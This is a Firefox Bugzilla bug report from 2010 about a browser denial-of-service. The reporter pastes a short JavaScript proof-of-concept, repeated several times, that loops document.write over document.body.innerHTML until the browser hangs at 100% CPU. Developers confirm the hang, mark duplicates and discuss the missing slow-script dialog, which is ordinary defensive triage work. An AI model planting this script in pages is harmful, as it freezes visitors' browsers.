Last Comment Bug 612029 - document.write(document.body.innerHTML) DOS Attack (hang with 100% CPU) (exploit-db 15498) (missing slow script dialog)
: document.write(document.body.innerHTML) DOS Attack (hang with 100% CPU) (expl...
Status: NEW
[sg:dos]
: hang
Product: Firefox
Classification: Client Software
Component: General (show other bugs)
: unspecified
: x86 Windows XP
: -- normal with 1 vote (vote)
: ---
Assigned To: Nobody; OK to take it and work on it
:
Mentors:
http://www.exploit-db.com/exploits/15...
: 612365 612597 744637 771622 833874 (view as bug list)
Depends on: 641105
Blocks:
  Show dependency treegraph
 
Reported: 2010-11-13 13:08 PST by Yusuf Şen
Modified: 2015-03-19 08:20 PDT (History)
10 users (show)
See Also:
Crash Signature:
(edit)
QA Whiteboard:
Iteration: ---
Points: ---
Has Regression Range: ---
Has STR: ---
-
wanted
wanted


Attachments

Description Yusuf Şen 2010-11-13 13:08:31 PST
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12

<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++)
{
    document.write("a");
}
 
for (i=0;i<=3;i++)
{
    document.write(document.body.innerHTML);
}
 
</script>

Reproducible: Always

Steps to Reproduce:
1.Ddos Atack
2.
3.
Actual Results:  
<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++)
{
    document.write("a");
}
 
for (i=0;i<=3;i++)
{
    document.write(document.body.innerHTML);
}
 
</script>

Expected Results:  
<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++)
{
    document.write("a");
}
 
for (i=0;i<=3;i++)
{
    document.write(document.body.innerHTML);
}
 
</script>

<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++)
{
    document.write("a");
}
 
for (i=0;i<=3;i++)
{
    document.write(document.body.innerHTML);
}
 
</script>
Comment 1 Yusuf Şen 2010-11-13 13:09:29 PST
<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++)
{
    document.write("a");
}
 
for (i=0;i<=3;i++)
{
    document.write(document.body.innerHTML);
}
 
</script>
Comment 2 Yusuf Şen 2010-11-13 13:12:03 PST
http://www.cyber-heaven.tk
Comment 3 Mats Palmgren (vacation) 2010-11-14 18:25:51 PST
This was published 2010-11-12 at http://www.exploit-db.com/exploits/15498/
Comment 4 Mats Palmgren (vacation) 2010-11-14 20:13:38 PST
I don't see any crash using Fx 3.6.12 on WinXP, just a 100% CPU hang.
Comment 5 Daniel Veditz [:dveditz] 2010-11-15 10:13:25 PST
We probably didn't need 5 copies of the code in-line...

Since it's public at exploit-db there's no point in keeping the bug hidden, we'll just get dupes.
Comment 6 Dietrich Ayala (:dietrich) 2010-11-15 10:40:42 PST
Is 4.0 afflicted?
Comment 7 Mats Palmgren (vacation) 2010-11-15 17:22:59 PST
*** Bug 612365 has been marked as a duplicate of this bug. ***
Comment 8 Mats Palmgren (vacation) 2010-11-15 20:09:41 PST
(In reply to comment #6)
> Is 4.0 afflicted?

Yes, in the same way as 3.6.12: 100% CPU, no crash, no "slow script" dialog.
Tested on Linux, WinXP and OSX.  On Linux, the OOM killer kills the process
after ~10 seconds.
Comment 9 Ludovic Hirlimann [:Usul] 2010-11-16 08:46:44 PST
*** Bug 612597 has been marked as a duplicate of this bug. ***
Comment 10 Daniel Veditz [:dveditz] 2010-11-17 11:51:22 PST
We should at least figure out if we can make the slow-script dialog show up.
Comment 11 Mats Palmgren (vacation) 2013-01-23 19:01:49 PST
*** Bug 833874 has been marked as a duplicate of this bug. ***
Comment 12 Mats Palmgren (vacation) 2013-01-23 19:06:05 PST
*** Bug 771622 has been marked as a duplicate of this bug. ***
Comment 13 Mats Palmgren (vacation) 2013-01-23 19:18:02 PST
*** Bug 744637 has been marked as a duplicate of this bug. ***

Note You need to log in before you can comment on or make changes to this bug.